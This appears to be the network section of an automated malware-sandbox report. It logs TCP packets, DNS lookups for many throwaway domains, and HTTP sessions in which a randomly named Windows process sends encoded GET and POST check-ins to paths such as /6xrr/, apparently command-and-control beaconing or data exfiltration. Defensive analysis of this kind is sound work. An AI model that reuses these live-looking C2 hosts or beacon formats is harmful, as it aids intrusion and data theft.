                                                                              Jan 11, 2025 09:30:00.790191889 CET8050012203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:00.790266991 CET5001280192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:30:00.790421963 CET5001280192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:30:01.643220901 CET5001280192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:30:02.666735888 CET5001380192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:30:02.671715975 CET8050013203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:02.672796011 CET5001380192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:30:02.682724953 CET5001380192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:30:02.687632084 CET8050013203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:03.301008940 CET8050013203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:03.301019907 CET8050013203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:03.301026106 CET8050013203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:03.301095009 CET8050013203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:03.301103115 CET8050013203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:03.301131010 CET8050013203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:03.301130056 CET5001380192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:30:03.301213026 CET8050013203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:03.301218033 CET8050013203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:03.301232100 CET8050013203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:03.301418066 CET5001380192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:30:03.301418066 CET5001380192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:30:03.301418066 CET5001380192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:30:03.301609993 CET8050013203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:03.301718950 CET5001380192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:30:03.306094885 CET8050013203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:03.306102991 CET8050013203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:03.306116104 CET8050013203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:03.306122065 CET8050013203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:03.306289911 CET5001380192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:30:03.393325090 CET8050013203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:03.393347979 CET8050013203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:03.393373966 CET8050013203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:03.393467903 CET5001380192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:30:03.396898031 CET5001380192.168.2.8203.161.42.73
                                                                              Jan 11, 2025 09:30:03.401702881 CET8050013203.161.42.73192.168.2.8
                                                                              Jan 11, 2025 09:30:08.429061890 CET5001480192.168.2.8172.67.215.235
                                                                              Jan 11, 2025 09:30:08.433841944 CET8050014172.67.215.235192.168.2.8
                                                                              Jan 11, 2025 09:30:08.434839010 CET5001480192.168.2.8172.67.215.235
                                                                              Jan 11, 2025 09:30:08.449534893 CET5001480192.168.2.8172.67.215.235
                                                                              Jan 11, 2025 09:30:08.454319000 CET8050014172.67.215.235192.168.2.8
                                                                              Jan 11, 2025 09:30:09.185920954 CET8050014172.67.215.235192.168.2.8
                                                                              Jan 11, 2025 09:30:09.185931921 CET8050014172.67.215.235192.168.2.8
                                                                              Jan 11, 2025 09:30:09.186072111 CET5001480192.168.2.8172.67.215.235
                                                                              Jan 11, 2025 09:30:09.186275005 CET8050014172.67.215.235192.168.2.8
                                                                              Jan 11, 2025 09:30:09.186381102 CET5001480192.168.2.8172.67.215.235
                                                                              Jan 11, 2025 09:30:09.955744028 CET5001480192.168.2.8172.67.215.235
                                                                              Jan 11, 2025 09:30:10.974803925 CET5001580192.168.2.8172.67.215.235
                                                                              Jan 11, 2025 09:30:10.979863882 CET8050015172.67.215.235192.168.2.8
                                                                              Jan 11, 2025 09:30:10.980880976 CET5001580192.168.2.8172.67.215.235
                                                                              Jan 11, 2025 09:30:10.995969057 CET5001580192.168.2.8172.67.215.235
                                                                              Jan 11, 2025 09:30:11.001234055 CET8050015172.67.215.235192.168.2.8
                                                                              Jan 11, 2025 09:30:11.796701908 CET8050015172.67.215.235192.168.2.8
                                                                              Jan 11, 2025 09:30:11.796720028 CET8050015172.67.215.235192.168.2.8
                                                                              Jan 11, 2025 09:30:11.796730995 CET8050015172.67.215.235192.168.2.8
                                                                              Jan 11, 2025 09:30:11.796739101 CET8050015172.67.215.235192.168.2.8
                                                                              Jan 11, 2025 09:30:11.796797037 CET5001580192.168.2.8172.67.215.235
                                                                              Jan 11, 2025 09:30:12.502618074 CET5001580192.168.2.8172.67.215.235
                                                                              Jan 11, 2025 09:30:13.521544933 CET5001680192.168.2.8172.67.215.235
                                                                              Jan 11, 2025 09:30:13.526500940 CET8050016172.67.215.235192.168.2.8
                                                                              Jan 11, 2025 09:30:13.526684999 CET5001680192.168.2.8172.67.215.235
                                                                              Jan 11, 2025 09:30:13.541340113 CET5001680192.168.2.8172.67.215.235
                                                                              Jan 11, 2025 09:30:13.546274900 CET8050016172.67.215.235192.168.2.8
                                                                              Jan 11, 2025 09:30:13.546408892 CET8050016172.67.215.235192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 11, 2025 09:27:08.124028921 CET | 192.168.2.8 | 1.1.1.1 | 0x9df5 | Standard query (0) | www.izmirescortg.xyz | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:27:23.834701061 CET | 192.168.2.8 | 1.1.1.1 | 0xca43 | Standard query (0) | www.aballanet.cat | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:27:37.381458998 CET | 192.168.2.8 | 1.1.1.1 | 0xbbf6 | Standard query (0) | www.madhf.tech | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:27:50.974895000 CET | 192.168.2.8 | 1.1.1.1 | 0x6789 | Standard query (0) | www.canadavinreport.site | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:28:04.272236109 CET | 192.168.2.8 | 1.1.1.1 | 0x69ec | Standard query (0) | www.yunlekeji.top | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:28:05.268244028 CET | 192.168.2.8 | 1.1.1.1 | 0x69ec | Standard query (0) | www.yunlekeji.top | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:28:19.022715092 CET | 192.168.2.8 | 1.1.1.1 | 0xac83 | Standard query (0) | www.logidant.xyz | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:28:32.413129091 CET | 192.168.2.8 | 1.1.1.1 | 0x817d | Standard query (0) | www.laohub10.net | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:28:46.568720102 CET | 192.168.2.8 | 1.1.1.1 | 0x34fc | Standard query (0) | www.zkdamdjj.shop | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:29:38.804008007 CET | 192.168.2.8 | 1.1.1.1 | 0xcde2 | Standard query (0) | www.tals.xyz | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:29:54.990899086 CET | 192.168.2.8 | 1.1.1.1 | 0x853f | Standard query (0) | www.brightvision.website | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:30:08.412636995 CET | 192.168.2.8 | 1.1.1.1 | 0x4ee9 | Standard query (0) | www.airrelax.shop | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:30:21.882054090 CET | 192.168.2.8 | 1.1.1.1 | 0xc434 | Standard query (0) | www.cstrategy.online | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:30:35.670994043 CET | 192.168.2.8 | 1.1.1.1 | 0x30af | Standard query (0) | www.bloodbalancecaps.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 11, 2025 09:27:08.148448944 CET | 1.1.1.1 | 192.168.2.8 | 0x9df5 | No error (0) | www.izmirescortg.xyz | - | 172.67.186.192 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:27:08.148448944 CET | 1.1.1.1 | 192.168.2.8 | 0x9df5 | No error (0) | www.izmirescortg.xyz | - | 104.21.36.62 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:27:23.858900070 CET | 1.1.1.1 | 192.168.2.8 | 0xca43 | No error (0) | www.aballanet.cat | aballanet.cat | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 09:27:23.858900070 CET | 1.1.1.1 | 192.168.2.8 | 0xca43 | No error (0) | aballanet.cat | - | 134.0.14.158 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:27:37.682338953 CET | 1.1.1.1 | 192.168.2.8 | 0xbbf6 | No error (0) | www.madhf.tech | - | 103.224.182.242 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:27:50.999321938 CET | 1.1.1.1 | 192.168.2.8 | 0x6789 | No error (0) | www.canadavinreport.site | - | 185.27.134.206 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:28:05.405982971 CET | 1.1.1.1 | 192.168.2.8 | 0x69ec | No error (0) | www.yunlekeji.top | www-yunlekeji-top.lo0.faipod.com | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 09:28:05.405982971 CET | 1.1.1.1 | 192.168.2.8 | 0x69ec | No error (0) | www-yunlekeji-top.lo0.faipod.com | fap-a13f5c64.faipod.com | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 09:28:05.405982971 CET | 1.1.1.1 | 192.168.2.8 | 0x69ec | No error (0) | fap-a13f5c64.faipod.com | - | 165.154.96.210 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:28:05.405992031 CET | 1.1.1.1 | 192.168.2.8 | 0x69ec | No error (0) | www.yunlekeji.top | www-yunlekeji-top.lo0.faipod.com | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 09:28:05.405992031 CET | 1.1.1.1 | 192.168.2.8 | 0x69ec | No error (0) | www-yunlekeji-top.lo0.faipod.com | fap-a13f5c64.faipod.com | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 09:28:05.405992031 CET | 1.1.1.1 | 192.168.2.8 | 0x69ec | No error (0) | fap-a13f5c64.faipod.com | - | 165.154.96.210 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:28:19.046083927 CET | 1.1.1.1 | 192.168.2.8 | 0xac83 | No error (0) | www.logidant.xyz | logidant.xyz | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 09:28:19.046083927 CET | 1.1.1.1 | 192.168.2.8 | 0xac83 | No error (0) | logidant.xyz | - | 45.141.156.114 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:28:32.936409950 CET | 1.1.1.1 | 192.168.2.8 | 0x817d | No error (0) | www.laohub10.net | r0lqcud7.nbnnn.xyz | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 09:28:32.936409950 CET | 1.1.1.1 | 192.168.2.8 | 0x817d | No error (0) | r0lqcud7.nbnnn.xyz | - | 202.79.161.151 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:28:32.936409950 CET | 1.1.1.1 | 192.168.2.8 | 0x817d | No error (0) | r0lqcud7.nbnnn.xyz | - | 23.225.159.42 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:28:32.936409950 CET | 1.1.1.1 | 192.168.2.8 | 0x817d | No error (0) | r0lqcud7.nbnnn.xyz | - | 23.225.160.132 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:28:32.936409950 CET | 1.1.1.1 | 192.168.2.8 | 0x817d | No error (0) | r0lqcud7.nbnnn.xyz | - | 27.124.4.246 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:28:46.584135056 CET | 1.1.1.1 | 192.168.2.8 | 0x34fc | No error (0) | www.zkdamdjj.shop | - | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:28:46.584135056 CET | 1.1.1.1 | 192.168.2.8 | 0x34fc | No error (0) | www.zkdamdjj.shop | - | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:29:38.815242052 CET | 1.1.1.1 | 192.168.2.8 | 0xcde2 | No error (0) | www.tals.xyz | - | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:29:38.815242052 CET | 1.1.1.1 | 192.168.2.8 | 0xcde2 | No error (0) | www.tals.xyz | - | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:29:55.001682997 CET | 1.1.1.1 | 192.168.2.8 | 0x853f | No error (0) | www.brightvision.website | - | 203.161.42.73 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:30:08.426120996 CET | 1.1.1.1 | 192.168.2.8 | 0x4ee9 | No error (0) | www.airrelax.shop | - | 172.67.215.235 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:30:08.426120996 CET | 1.1.1.1 | 192.168.2.8 | 0x4ee9 | No error (0) | www.airrelax.shop | - | 104.21.16.206 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:30:22.272552013 CET | 1.1.1.1 | 192.168.2.8 | 0xc434 | No error (0) | www.cstrategy.online | cstrategy.online | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 09:30:22.272552013 CET | 1.1.1.1 | 192.168.2.8 | 0xc434 | No error (0) | cstrategy.online | - | 194.76.119.60 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:30:35.985554934 CET | 1.1.1.1 | 192.168.2.8 | 0x30af | No error (0) | www.bloodbalancecaps.shop | bloodbalancecaps.shop | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 09:30:35.985554934 CET | 1.1.1.1 | 192.168.2.8 | 0x30af | No error (0) | bloodbalancecaps.shop | - | 108.179.253.197 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49708 | 172.67.186.192 | 80 | 3920 | C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:27:08.169532061 CET | 380 | OUT | GET /lnl7/?m8=urJ0WtmP0FPTTB&DzLTc=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgZUCCvIMy+6OdADZldWa3Ro5vmyUj0qJuSG5eCoJgas7XnA== HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.izmirescortg.xyz
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Jan 11, 2025 09:27:08.792464018 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                              Date: Sat, 11 Jan 2025 08:27:08 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                              Pragma: no-cache
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kVYvWshS%2FLMXhL30KcqVpG4p9%2FSKLE16xMIFoVsN5EjpAGarcV8DF56pCpmAErBIxKRqShDACSqdOIlXT8xKs9fKn9XvuNNXLTjxCceyf7SaXaOmPVN3aPVOGyQIXKec%2BkSid8GPlA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 900386a28e937ce7-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1816&min_rtt=1816&rtt_var=908&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=380&delivery_rate=0&cwnd=197&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Ascii: 4d6<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div styl


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49709 | 134.0.14.158 | 80 | 3920 | C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:27:23.882349968 CET | 634 | OUT | POST /6xrr/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 206
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.aballanet.cat
                                                                              Origin: http://www.aballanet.cat
                                                                              Referer: http://www.aballanet.cat/6xrr/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Ascii: DzLTc=KzhgXQhB/IGl4lEBpAQCzM9Ta8bp9v1A2XPw38nsOEd5D4DccATbEmSbKEnrE2IN96ChUXIOAbQtGqFFaueReL6p4RoWjJZ594Xp3L/A/2p79M4/TZoPdzlCWvq7jY/A6vp1KYZV6gMRigjZPHCMa0Rrv9+hmZMR4AibYXKPPimXr0DOXg3ATDoEmwRuY0Gum8+aqGY=
Jan 11, 2025 09:27:24.773608923 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                              Date: Sat, 11 Jan 2025 08:27:24 GMT
                                                                              Server: Apache
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"
                                                                              Upgrade: h2,h2c
                                                                              Connection: Upgrade, close
                                                                              Transfer-Encoding: chunked
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Ascii: 14bd<!doctype html><html lang="ca" class="no-js"> <head> <meta charset="UTF-8"> <title>Pgina no trobada - Albert Aballanet</title> <meta name="keywords" content="Albert Aballanet, Arquitecto Doctor UPC, trayectoria, tesis de estudio, publicaciones de Albert Aballanet, La casa a cuatro vientos en la Bonanova"> <link href="//www.google-analytics.com" rel="dns-prefetch"> <link href="http://aballanet.cat/wp-content/themes/rwd-theme/img/icons/touch.png" rel="apple-touch-icon-precomposed"> <link rel="alternate" type="application/rss+xml" title="Albert Aballanet" href="https://aballanet.cat/feed/" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="Arquitecte Doctor UP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49711 | 134.0.14.158 | 80 | 3920 | C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:27:26.465841055 CET | 654 | OUT | POST /6xrr/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 226
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.aballanet.cat
                                                                              Origin: http://www.aballanet.cat
                                                                              Referer: http://www.aballanet.cat/6xrr/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Ascii: DzLTc=KzhgXQhB/IGl6FUBymYC1s9QVcbp3P1M2XLw39zaO255GpzcO1/bHmSbe0nuKWJD96HSUWkOAbUtGoNFaZyefb6rjhoUppZ594Xp3Kad/2x79cI/T919DjlBG/q7nY/E6vpbKZFv6i0RiknZOWCLT0Rywt/kmY4U4RyUQHqVDT7uuCykNC/GQDAvmz5YdDbG8fuq0RMrKyjxw5edjCL+e/tPmG9w
Jan 11, 2025 09:27:27.306538105 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                              Date: Sat, 11 Jan 2025 08:27:27 GMT
                                                                              Server: Apache
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"
                                                                              Upgrade: h2,h2c
                                                                              Connection: Upgrade, close
                                                                              Transfer-Encoding: chunked
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Ascii: 14bd<!doctype html><html lang="ca" class="no-js"> <head> <meta charset="UTF-8"> <title>Pgina no trobada - Albert Aballanet</title> <meta name="keywords" content="Albert Aballanet, Arquitecto Doctor UPC, trayectoria, tesis de estudio, publicaciones de Albert Aballanet, La casa a cuatro vientos en la Bonanova"> <link href="//www.google-analytics.com" rel="dns-prefetch"> <link href="http://aballanet.cat/wp-content/themes/rwd-theme/img/icons/touch.png" rel="apple-touch-icon-precomposed"> <link rel="alternate" type="application/rss+xml" title="Albert Aballanet" href="https://aballanet.cat/feed/" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="Arquitecte Doctor UP


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              3 | 192.168.2.8 | 49712 | 134.0.14.158 | 80 | 3920 | C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 11, 2025 09:27:29.008991003 CET | 1671 | OUT | POST /6xrr/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 1242
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.aballanet.cat
                                                                              Origin: http://www.aballanet.cat
                                                                              Referer: http://www.aballanet.cat/6xrr/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Jan 11, 2025 09:27:29.844671011 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                              Date: Sat, 11 Jan 2025 08:27:29 GMT
                                                                              Server: Apache
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"
                                                                              Upgrade: h2,h2c
                                                                              Connection: Upgrade, close
                                                                              Transfer-Encoding: chunked
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Ascii: 14bd<!doctype html><html lang="ca" class="no-js"> <head> <meta charset="UTF-8"> <title>Pàgina no trobada - Albert Aballanet</title> <meta name="keywords" content="Albert Aballanet, Arquitecto Doctor UPC, trayectoria, tesis de estudio, publicaciones de Albert Aballanet, La casa a cuatro vientos en la Bonanova"> <link href="//www.google-analytics.com" rel="dns-prefetch"> <link href="http://aballanet.cat/wp-content/themes/rwd-theme/img/icons/touch.png" rel="apple-touch-icon-precomposed"> <link rel="alternate" type="application/rss+xml" title="Albert Aballanet" href="https://aballanet.cat/feed/" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="Arquitecte Doctor UP
                                                                              Jan 11, 2025 09:27:29.844696045 CET | 224 | IN | Data Ascii: C"> <meta name='robots' content='noindex, follow' /><style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>... This site is optimized with the Yoast SEO plugin
                                                                              Jan 11, 2025 09:27:29.844706059 CET | 1236 | IN | Data Ascii: v23.1 - https://yoast.com/wordpress/plugins/seo/ --><meta property="og:locale" content="ca_ES" /><meta property="og:title" content="Pàgina no trobada - Albert Aballanet" /><meta property="og:site_name" content="Albert Aballanet" /><sc
                                                                              Jan 11, 2025 09:27:29.844727039 CET | 1236 | IN | Data Ascii: in.js?ver=6.7.1"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.
                                                                              Jan 11, 2025 09:27:29.844738960 CET | 448 | IN | Data Ascii: illReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="w
                                                                              Jan 11, 2025 09:27:29.844794989 CET | 1236 | IN | Data Ascii: nction(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("un
                                                                              Jan 11, 2025 09:27:29.844808102 CET | 1236 | IN | Data Ascii: nt),window._wpemojiSettings);/* ... */</script>2000<style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1e
                                                                              Jan 11, 2025 09:27:29.844861031 CET | 448 | IN | Data Ascii: wp-includes/css/dist/patterns/style.min.css?ver=6.7.1' media='all' /><link rel='stylesheet' id='wp-editor-css' href='http://aballanet.cat/wp-includes/css/dist/editor/style.min.css?ver=6.7.1' media='all' /><link rel='stylesheet' id='algori_pd
                                                                              Jan 11, 2025 09:27:29.844873905 CET | 1236 | IN | Data Ascii: file is auto-generated */.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:
                                                                              Jan 11, 2025 09:27:29.844902039 CET | 1116 | IN | Data Ascii: 7,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradi
                                                                              Jan 11, 2025 09:27:29.849606037 CET | 1236 | IN | Data Ascii: ient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight:


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              4 | 192.168.2.8 | 49713 | 134.0.14.158 | 80 | 3920 | C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 11, 2025 09:27:31.551673889 CET | 377 | OUT | GET /6xrr/?DzLTc=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBQY2hj09WsNhqz7jh3pjJtHZ6ivVVWaE+CFUoLu/IsL675g==&m8=urJ0WtmP0FPTTB HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.aballanet.cat
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Jan 11, 2025 09:27:32.368977070 CET | 505 | IN | HTTP/1.1 301 Moved Permanently
                                                                              Date: Sat, 11 Jan 2025 08:27:32 GMT
                                                                              Server: Apache
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              X-Redirect-By: WordPress
                                                                              Upgrade: h2,h2c
                                                                              Connection: Upgrade, close
                                                                              Location: http://aballanet.cat/6xrr/?DzLTc=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBQY2hj09WsNhqz7jh3pjJtHZ6ivVVWaE+CFUoLu/IsL675g==&m8=urJ0WtmP0FPTTB
                                                                              Content-Length: 0
                                                                              Content-Type: text/html; charset=UTF-8


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
